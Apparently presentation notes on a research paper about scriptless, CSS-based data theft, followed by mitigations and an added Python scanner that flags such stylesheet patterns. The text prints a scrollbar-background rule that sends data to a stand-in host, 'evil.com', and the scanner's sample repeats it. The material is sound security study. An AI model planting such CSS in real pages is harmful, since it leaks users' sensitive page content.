Script less Attacks Stealing the Pie Without Touching the Sill
Background
• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird and Windows 8 are using HTML, security extensions like NoScript are being adopted by users.
• Given all these defense strategies, we expect that attackers will strive towards developing "Scriptless Attacks", which achieve the same goal as XSS attacks without using any scripting.
BEYOND SCRIPT-BASED ATTACKS
Assumptions:
• The attacker can inject arbitrary data into the DOM rendered by the browser.
• We assume that scripting is completely disabled.
• The following browser features are useful building blocks in constructing attacks: web fonts based on SVG and WOFF.
• The attacker employs these fonts and utilizes their features to vary the properties of displayed website content.
Attack Components
• CSS-based Animations: with CSS-based animations it is possible to change a wide range of CSS and DOM properties over time without using any script code.
• The CSS Content Property: CSS allows a property called content to extract arbitrary attribute values and display the value either before, after, or instead of the selected element (the attribute value must be quoted, since it is not a plain identifier):

    a[href^="http://"]:after { content: attr(href) }

• CSS Media Queries: a stylesheet can react to the viewport size without any script, for example:

    <style type="text/css">
    @media screen and (min-width: 401px) {
      * { background: green; }
      body:after { content: 'larger view-port' }
    }
    @media screen and (max-width: 400px) {
      * { background: red; }
      body:after { content: 'smaller view-port' }
    }
    </style>
Measurement-based Content Exfiltration using Smart Scrollbars
To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in the section above.

    <div id="s">secret</div>
    <style type="text/css">
    div#s::-webkit-scrollbar-track-piece:vertical:increment {
      background: red url(//evil.com?s);
    }
    </style>

• To mitigate this attack:
  • it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally;
  • all background images and similar external resources should be loaded during page load and not on appearance or state occurrence.
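As an added defender-side example (not code from the paper or the slides), the following Python scanner flags the three attack components described above when they appear in a stylesheet: attr()-based content extraction, width-based media queries whose rules trigger an external load, and scrollbar pseudo-element rules that load an external resource. The sample stylesheet and the host probe.example are constructed for the example; evil.com is the host from the slide.

```python
import re

# Constructed sample stylesheet: the three attack components from the
# slides (attr() extraction, media-query probing, scrollbar exfiltration)
# plus one benign rule that must not be flagged.
SAMPLE_CSS = """
a[href^="http://"]:after{content:attr(href)}
@media screen and (max-width: 400px){ *{background:red url(//probe.example/narrow)} }
div#s::-webkit-scrollbar-track-piece:vertical:increment{background:red url(//evil.com?s);}
h1{background:url(/static/logo.png)}
"""

EXTERNAL_URL = re.compile(r"url\(\s*['\"]?(?:https?:)?//", re.I)  # absolute or scheme-relative
ATTR_CONTENT = re.compile(r"content\s*:[^;}]*attr\(", re.I)        # content: ... attr(...)
WIDTH_QUERY = re.compile(r"(?:min|max)-width", re.I)
# An @media block whose inner rules are not nested any further.
MEDIA_BLOCK = re.compile(r"@media([^{]*)\{((?:[^{}]*\{[^{}]*\})*)\s*\}")
# Innermost selector{declarations} pairs (skips the @media header itself).
FLAT_RULE = re.compile(r"([^{}@]+)\{([^{}]*)\}")


def scan_css(css):
    """Return (category, selector) pairs for rules matching the attack patterns."""
    findings = []
    # Media-query component: a width condition that triggers an external load
    # tells the remote server the viewport size without any script.
    for cond, body in MEDIA_BLOCK.findall(css):
        if WIDTH_QUERY.search(cond) and EXTERNAL_URL.search(body):
            findings.append(("media-query-probe", "@media " + cond.strip()))
    for selector, decls in FLAT_RULE.findall(css):
        selector = selector.strip()
        # Content-property component: attr() copies an attribute value into rendered text.
        if ATTR_CONTENT.search(decls):
            findings.append(("attr-extraction", selector))
        # Scrollbar component: a background fetched only when the scrollbar enters a
        # state turns an external request into a data-dependent signal.
        if "::-webkit-scrollbar" in selector and EXTERNAL_URL.search(decls):
            findings.append(("scrollbar-exfiltration", selector))
    return findings


if __name__ == "__main__":
    for category, selector in scan_css(SAMPLE_CSS):
        print(f"{category}: {selector}")
```

Same-origin url() references such as /static/logo.png are deliberately not flagged, matching the mitigation advice that resources fetched at page load are not the problem, only loads that depend on state or content.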
MITIGATION TECHNIQUES
• We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage:
• Content Security Policy (CSP)
• Detecting Detached Views
• Miscellaneous Defense Techniques

Conclusion: While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.